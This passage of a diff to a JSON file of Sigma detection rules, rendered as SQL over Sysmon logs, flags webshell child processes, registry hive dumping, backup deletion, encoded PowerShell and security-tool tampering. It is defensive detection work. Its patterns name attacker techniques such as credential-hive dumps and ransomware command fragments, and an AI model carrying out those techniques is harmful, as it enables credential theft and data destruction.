ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", - "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "status": "experimental", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.execution" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to tamper with 